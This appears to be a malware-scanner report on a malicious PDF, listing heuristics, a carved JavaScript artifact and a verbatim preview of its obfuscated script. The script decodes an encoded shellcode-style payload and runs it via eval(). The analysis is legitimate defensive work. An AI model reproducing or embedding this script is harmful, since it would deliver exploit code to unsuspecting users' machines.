MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript with a high-confidence `eval()` call, indicating obfuscated code execution. This suggests the document is designed to download and execute a secondary payload. No specific family could be identified due to the obfuscation.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
q1=1AR37Xa03y\"%AfQfQ%AfQfQ%AfQfQ%ALYoG%AQQ9G%A,,Ic%A8LGc%A8LLl%AoYQQ%AovfQ%AoGYw%Ao8L9%AYYoI%AYYYY%A8G<Y%ApYfo%AoYoY%A,foY%AoQwY%AcY,f%AfvYQ%AcY,f%A,oo<%AoYLQ%AoYoG%A,foY%AGcLQ%A,l8<%Aolwl%AL<LQ%AoYll%AoYoY%Aww,,%AGcoG%A<<8<%A,9ll%AL<ol%AoYlY%AoYoY%Aww,,%AGco<%AIw8<%AlL9Y%AL<vp%AoYLp%AoYoY%Aww,,%AGcoQ%ALL8<%ALYvl%AL<8Y%AoYQG%AoYoY%Aww,,%AGcYY%Avo8<%ALwc,%AL<9<%AoYvc%AoYoY%Aww,,%AwYYG%Ap<,Y%AcwvI%A,,l9%AY<ww%Ao8L,%AoYoo%AGloY%Acw,,%A,fIG%AoGww%Aoo89%A,fG,%AY<Gw%AL<Gc%AoY,f%AoYoY%A8<GY%AY9pc%AcYI … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x23A | 8116 bytes |
SHA-256: 7ff762b0f834cb9379bf60a53b228fc7e15915dd39b453e12921fb8468ac56e0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). 89 of 153 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function jUPrNcD9aDpF3HG(jUPrNcD9aDpF3HG,S6SCzMNbaXPK) {var druBur91UC1EMWHSJ=jUPrNcD9aDpF3HG. substr (S6SCzMNbaXPK, 1);return druBur91UC1EMWHSJ;}/*OIfmiLQI|UhSHB92CukBl4D|APzHi8TxHyap*/function zNegJ(icjuC91Q85xFvH) {/*qxlBV|IX4AaolbPffsfvhmTg5|nuhSuO*/var AmYpC3IJ8J9Lnf = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*WPcRXz[YP09rGfM]A8XmS3iZgS6zDL5aaX*//*xN3McuMK0rXpsVCU|A2DcLAROLNollWZ|QmRAzb0gygOKjjyfc2*/var NDxwy0vpGt /*n2P1EcgqD2G1ItJJikAF[gTjF3XlVQi8]x0NQW3T*/= new String("xByHEZ1znwGIpoY2K h}4dUT6DrtMWujV>Ja)XO35Fkg(eC{RN0qm7SA.PisbLlvQf9,<8c");/*ALYtUhR4|WTEq3KkRv5hU4|Iu3YGxrWx2uhMRz*/for(AzXBYVoxAqrJ0p=0;AzXBYVoxAqrJ0p<AmYpC3IJ8J9Lnf.length;AzXBYVoxAqrJ0p++) {if(icjuC91Q85xFvH == jUPrNcD9aDpF3HG(NDxwy0vpGt, AzXBYVoxAqrJ0p)) {/*yMb23V[dmyYJ]TzQDtoK*/return jUPrNcD9aDpF3HG(AmYpC3IJ8J9Lnf, AzXBYVoxAqrJ0p);/*WgUPR2birjX4B <xWTQ8HpIQ]AgCrLNOhujxBbOkJy8Dz*/}}return icjuC91Q85xFvH;}/*ALiGKqwS[uRdx8pANNuwAvOPWYDUb]jSFIZPyLiv6zPty5uBI*//*yIQDYmbc63Vg|bolrcwPO|Fed4ZN6hruq8xEkP*/var ZzSuE97hD67GmDAu = new String;var eCGwE69 = new String("\n.am1tqAwlOJYUel2F2mX1=1R3P1wmmasyH;\n.am1p)QP(rqkb.r92o5u;\n5ARXSgNR1DJ59pYhal}qk)khiyYdSQNeeRFI7PDVrWn1R8JhUSSTpe,0t6{CHE\n11PkgC31yYdSQNeeRFI7PDVrWzC3RFSk1*1v1x1R8JhUSSTpe,0t6{CHE\n1111YdSQNeeRFI7PDVrW1+=1YdSQNeeRFI7PDVrW;\n11Z\n11YdSQNeeRFI7PDVrW1=1YdSQNeeRFI7PDVrWz7A)7SmgRFyLn1R8JhUSSTpe,0t6{C1/1vH;\n11m3SAmR1YdSQNeeRFI7PDVrW;\nZ\n5ARXSgNR155NJ6JU<CYQI{Wk7yg2Ibw<TTqMp 7b93HE\n11.am1uSo,t)GomoDOgcj}1=1LiLXLXLXLX;\n11.am1.ghJ0gi5GGi9wv(q1=1AR37Xa03y\"%AfQfQ%AfQfQ%AfQfQ%ALYoG%AQQ9G%A,,Ic%A8LGc%A8LLl%AoYQQ%AovfQ%AoGYw%Ao8L9%AYYoI%AYYYY%A8G<Y%ApYfo%AoYoY%A,foY%AoQwY%AcY,f%AfvYQ%AcY,f%A,oo<%AoYLQ%AoYoG%A,foY%AGcLQ%A,l8<%Aolwl%AL<LQ%AoYll%AoYoY%Aww,,%AGcoG%A<<8<%A,9ll%AL<ol%AoYlY%AoYoY%Aww,,%AGco<%AIw8<%AlL9Y%AL<vp%AoYLp%AoYoY%Aww,,%AGcoQ%ALL8<%ALYvl%AL<8Y%AoYQG%AoYoY%Aww,,%AGcYY%Avo8<%ALwc,%AL<9<%AoYvc%AoYoY%Aww,,%AwYYG%Ap<,Y%AcwvI%A,,l9%AY<ww%Ao8L,%AoYoo%AGloY%Acw,,%A,fIG%AoGww%Aoo89%A,fG,%AY<Gw%AL<Gc%AoY,f%AoYoY%A8<GY%AY9pc%AcYIL%A<8L<%AoYoY%A,,oY%AYQww%Avw,f%AvY,I%A,,GY%AIYww%AlL8<%AoYoY%AGYoY%Aww,f%A89YG%AG,op%AGw,f%AL<Y<%AoY8o%AoYoY%AwwoI%Av8IY%AGQoY%AIlcl%Av88w%AoGwY%A8wc<%AoYoY%AcwlL%A,fIY%AoQww%Aoo89%A,fG,%AY<Gw%AwYL<%AoYoY%A89oY%AG<o8%AwwoI%ApIIG%AGIQf%AlLGI%AIYcw%AGIGY%Aww,f%A89YQ%AG,ow%AGw,f%AL<Y<%AoYII%AoYoY%AoY89%AcwlL%A,fIY%Ao<ww%Aop89%A,fG,%AY<Gw%AYYL<%AoYoY%A89oY%A,flL%AYYww%Aoo89%A,fG,%AY<Gw%AoYL<%AoYoY%AwooY%AGpGf%ALooI%ALooI%ALooI%ALooI%ALQ,I%AG9oG%A,fGI%ALpQ9%AGpl8%ALYlL%A,fGw%A,fLQ%Ao<cv%AGv,f%AGcoQ%AcI,f%A,fpQ%AYlcG%AoIc<%AGclI%Acc,f%AoIIY%ApIlI%Aw,v,%Afvwo%AvIoI%ApIGc%AoLlc%AYY9l%Alpp9%Ao<cG%Avlvo%AoIov%AwYlp%AloLf%Allpf%AcwGl%AG9Lw%ALf,f%AG9,f%AoIIG%A8cQv%AoQ,f%A,fwf%AYQG9%AQvoI%AoG,f%AoI,f%AGlvw%AvpGv%AoYo<%AlGL<%AlLll%AGwlL%AwQGp%AwLwv%AoYwl%A<f,8%A<L<f%AvYQw%A,fvY%A,pQL%AQl,l%A<Q,o%A,cvo%A,,,o%AvY,Y%A,I,v%A,<,Y%A,IvY%A,l,Y%Avo,f%A,8<L%AQY<L%A,f,c%AQcQp%ALLQL\"H;\n11g51yg2Ibw<TTqMp 7b931==1lHE\n1111uSo,t)GomoDOgcj}1=1LiQLQLQLQL;\n1111.ghJ0gi5GGi9wv(q1=1AR37Xa03y\"%AfQfQ%AfQfQ%AfQfQ%ALYoG%AQQ9G%A,,Ic%A8LGc%A8LLl%AoYQQ%AovfQ%AoGYw%Ao8L9%AYYoI%AYYYY%A8G<Y%ApYfo%AoYoY%A,foY%AoQwY%AcY,f%AfvYQ%AcY,f%A,oo<%AoYLQ%AoYoG%A,foY%AGcLQ%A,l8<%Aolwl%AL<LQ%AoYll%AoYoY%Aww,,%AGcoG%A<<8<%A,9ll%AL<ol%AoYlY%AoYoY%Aww,,%AGco<%AIw8<%AlL9Y%AL<vp%AoYLp%AoYoY%Aww,,%AGcoQ%ALL8<%ALYvl%AL<8Y%AoYQG%AoYoY%Aww,,%AGcYY%Avo8<%ALwc,%AL<9<%AoYvc%AoYoY%Aww,,%AwYYG%Ap<,Y%AcwvI%A,,l9%AY<ww%Ao8L,%AoYoo%AGloY%Acw,,%A,fIG%AoGww%Aoo89%A,fG,%AY<Gw%AL<Gc%AoY,f%AoYoY%A8<GY%AY9pc%AcYIL%A<8L<%AoYoY%A,,oY%AYQww%Avw,f%AvY,I%A,,GY%AIYww%AlL8<%AoYoY%AGYoY%Aww,f%A89YG%AG,op%AGw,f%AL<Y<%AoY8o%AoYoY%AwwoI%Av8IY%AGQoY%AIlcl%Av88w%AoGwY%A8wc<%AoYoY%AcwlL%A,fIY%AoQww%Aoo89%A,fG,%AY<Gw%AwYL<%AoYoY%A89oY%AG<o8%AwwoI%ApIIG%AGIQf%AlLGI%AIYcw%AGIGY%Aww,f%A89YQ%AG,ow%AGw,f%AL<Y<%AoYII%AoYoY%AoY89%AcwlL%A,fIY%Ao<ww%Aop89%A,fG,%AY<Gw%AYYL<%AoYoY%A89oY%A,flL%AYYww%Aoo89%A,fG,%AY<Gw%AoYL<%AoYoY%AwooY%AGpGf%ALooI%ALooI%ALooI%ALooI%ALQ,I%AG9oG%A,fGI%ALpQ9%AGpl8%ALYlL%A,fGw%A,fLQ%Ao<cv%AGv,f%AGcoQ%AcI,f%A,fpQ%AYlcG%AoIc<%AGclI%Acc,f%AoIIY%ApIlI%Aw,v,%Afvwo%AvIoI%ApIGc%AoLlc%AYY9l%Alpp9%Ao<cG%Avlvo%AoIov%AwYlp%AloLf%Allpf%AcwGl%AG9Lw%ALf,f%AG9,f%AoIIG%A8cQv%AoQ,f%A,fwf%AYQG9%AQvoI%AoG,f%AoI,f%AGlvw%AvpGv%AoYo<%AlGL<%AlLll%AGwlL%AwQGp%AwLwv%AoYwl%A<f,8%A<L<f%AvYQw%A,fvY%A,pQL%AQl,l%A<Q,o%A,cvo%A,,,o%AvY,Y%A,I,v%A,<,Y%A,IvY%A,l,Y%Avo,f%A,8<L%AQY<L%A,f,c%AQcQp%ALLQL\"H;\n11Z\n113C731g51yg2Ibw<TTqMp 7b931==1vHE\n1111.ghJ0gi5GGi9wv(q1=1AR37Xa03y\"%AfQfQ%AfQfQ%AfQfQ%ALYoG%AQQ9G%A,,Ic%A8LGc%A8LLl%AoYQQ%AovfQ%AoGYw%Ao8L9%AYYoI%AYYYY%A8G<Y%ApYfo%AoYoY%A,foY%AoQwY%AcY,f%AfvYQ%AcY,f%A,oo<%AoYLQ%AoYoG%A,foY%AGcLQ%A,l8<%Aolwl%AL<LQ%AoYll%AoYoY%Aww,,%AGcoG%A<<8<%A,9ll%AL<ol%AoYlY%AoYoY%Aww,,%AGco<%AIw8<%AlL9Y%AL<vp%AoYLp%AoYoY%Aww,,%AGcoQ%ALL8<%ALYvl%AL<8Y%AoYQG%AoYoY%Aww,,%AGcYY%Avo8<%ALwc,%AL<9<%AoYvc%AoYoY%Aww,,%AwYYG%Ap<,Y%AcwvI%A,,l9%AY<ww%Ao8L,%AoYoo%AGloY%Acw,,%A,fIG%AoGww%Aoo89%A,fG,%AY<Gw%AL<Gc%AoY,f%AoYoY%A8<GY%AY9pc%AcYIL%A<8L<%AoYoY%A,,oY%AYQww%Avw,f%AvY,I%A,,GY%AIYww%AlL8<%AoYoY%AGYoY%Aww,f%A89YG%AG,op%AGw,f%AL<Y<%AoY8o%AoYoY%AwwoI%Av8IY%AGQoY%AIlcl%Av88w%AoGwY%A8wc<%AoYoY%AcwlL%A,fIY%AoQww%Aoo89%A,fG,%AY<Gw%AwYL<%AoYoY%A89oY%AG<o8%AwwoI%ApIIG%AGIQf%AlLGI%AIYcw%AGIGY%Aww,f%A89YQ%AG,ow%AGw,f%AL<Y<%AoYII%AoYoY%AoY89%AcwlL%A,fIY%Ao<ww%Aop89%A,fG,%AY<Gw%AYYL<%AoYoY%A89oY%A,flL%AYYww%Aoo89%A,fG,%AY<Gw%AoYL<%AoYoY%AwooY%AGpGf%ALooI%ALooI%ALooI%ALooI%ALQ,I%AG9oG%A,fGI%ALpQ9%AGpl8%ALYlL%A,fGw%A,fLQ%Ao<cv%AGv,f%AGcoQ%AcI,f%A,fpQ%AYlcG%AoIc<%AGclI%Acc,f%AoIIY%ApIlI%Aw,v,%Afvwo%AvIoI%ApIGc%AoLlc%AYY9l%Alpp9%Ao<cG%Avlvo%AoIov%AwYlp%AloLf%Allpf%AcwGl%AG9Lw%ALf,f%AG9,f%AoIIG%A8cQv%AoQ,f%A,fwf%AYQG9%AQvoI%AoG,f%AoI,f%AGlvw%AvpGv%AoYo<%AlGL<%AlLll%AGwlL%AwQGp%AwLwv%AoYwl%A<f,8%A<L<f%AvYQw%A,fvY%A,pQL%AQl,l%A<Q,o%A,cvo%A,,,o%AvY,Y%A,I,v%A,<,Y%A,IvY%A,l,Y%Avo,f%A,8<L%AQY<L%A,f,c%AQcQp%ALLQL\"H;\n11Z\n11.am1DiPUJ8)D4Q99w)TJ1=1LifLLLLL;\n11.am1MgLLD8NX {FMRDhg1=1.ghJ0gi5GGi9wv(qzC3RFSk1*1v;\n11.am1R8JhUSSTpe,0t6{C1=1DiPUJ8)D4Q99w)TJ1-1yMgLLD8NX {FMRDhg1+1LiQ8H;\n11.am1YdSQNeeRFI7PDVrW1=1AR37Xa03y\"%AcLcL%AcLcL\"H;\n11YdSQNeeRFI7PDVrW1=1DJ59pYhal}qk)khiyYdSQNeeRFI7PDVrWn1R8JhUSSTpe,0t6{CH;\n11.am1AY<iUgUgCt{.fGuU1=1yuSo,t)GomoDOgcj}1-1LifLLLLLH1/1DiPUJ8)D4Q99w)TJ;\n115Nm1y.am1Y5j}{4P98OV.fm3r1=1L;1Y5j}{4P98OV.fm3r1x1AY<iUgUgCt{.fGuU;1Y5j}{4P98OV.fm3r1++1HE\n1111tqAwlOJYUel2F2mX[Y5j}{4P98OV.fm3r]1=1YdSQNeeRFI7PDVrW1+1.ghJ0gi5GGi9wv(q;\n11Z\nZ\n5ARXSgNR1reTWt{IpobL G5F,yHE\n11.am1bI68>4G5b(afaoWk1=1L;\n11.am1oSGr5T5ATNIJW7501=1a00z.g3P3mu3m7gNRzSNtSmgRFyH;\n11a00zXC3amMg{3TASyp)QP(rqkb.r92o5uH;\n\n11g51yoSGr5T5ATNIJW7501x1<zlHE\n111155NJ6JU<CYQI{Wk7yLH;\n1111.am1m9P3Dch6mAttLiwc1=1AR37Xa03y\"%ALXLX%ALXLX\"H;\n1111PkgC31ym9P3Dch6mAttLiwczC3RFSk1x1ffc9vHm9P3Dch6mAttLiwc1+=1m9P3Dch6mAttLiwc;\n1111Skg71zXNCCa)tSNm31=1INCCa)zXNCC3XSo{agC R5NyE\n1111117A)(1:1\"\"n1{7F1:1m9P3Dch6mAttLiwc\n1111Z\n1111H;\n11Z\ng51yoSGr5T5ATNIJW7501B=1cHE\n1111Sms1E\ng51ya00zONXzINCCa)zF3S XNRHE\n1111111155NJ6JU<CYQI{Wk7yvH;\n11111111.am1>dauCYDL9O(>jTU)1=1AR37Xa03y\"%Lc\"H;\n11111111PkgC31y>dauCYDL9O(>jTU)zC3RFSk1x1LifLLLH>dauCYDL9O(>jTU)1+=1>dauCYDL9O(>jTU);\n11111111>dauCYDL9O(>jTU)1=1\"Uz\"1+1>dauCYDL9O(>jTU);\na00zONXzINCCa)zF3S XNRy>dauCYDL9O(>jTU)H;\n11111111bI68>4G5b(afaoWk1=1l;\n111111Z\n1111113C731E\n11111111bI68>4G5b(afaoWk1=1l;\n111111Z\n1111Z\n1111XaSXk1y3HE\n111111bI68>4G5b(afaoWk1=1l;\n1111Z\n1111g51ybI68>4G5b(afaoWk1==1lHE\n111111g51yyoSGr5T5ATNIJW7501B=1<zl&&1oSGr5T5ATNIJW7501x1cHHE\n1111111155NJ6JU<CYQI{Wk7ylH;\n11111111.am1DhYSrJhhM{{X(PCa1=1\"lvcccccccccccccccccc\";\n111111115Nm1y.4<9ajo3Lip5daK01=1L;1.4<9ajo3Lip5daK01x1v<,;1.4<9ajo3Lip5daK01++1HE\n1111111111DhYSrJhhM{{X(PCa1+=1\"8\";\n11111111Z\n11111111ASgCz0mgRS5y\"%f9LLL5\"n1DhYSrJhhM{{X(PCaH;\n111111Z\n1111Z\n11Z\nZ\na00zDV(d<QFa0tpJ6sLg1=1reTWt{IpobL G5F,;\np)QP(rqkb.r92o5u1=1a00z73SMg{3TASy\"a00zDV(d<QFa0tpJ6sLgyH\"n1lLH;\n");/*hI2DUTr5AKsQZ{W35QSIM007hy}lZAI6JBAdUrZV2HmR*//*ALfOenbUeY1TKd|LmoUnoy8WNUPV6g4|sZJMDkhh9Z0K3jVfNqJ*/for(YZqnkZDZr=0;YZqnkZDZr<eCGwE69.length;YZqnkZDZr++)ZzSuE97hD67GmDAu += zNegJ(jUPrNcD9aDpF3HG(eCGwE69,YZqnkZDZr));eval(ZzSuE97hD67GmDAu);/*eHPrbeCXB7StXb6aCe8[AzMwY]SmObfsjuaAPcY*/
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.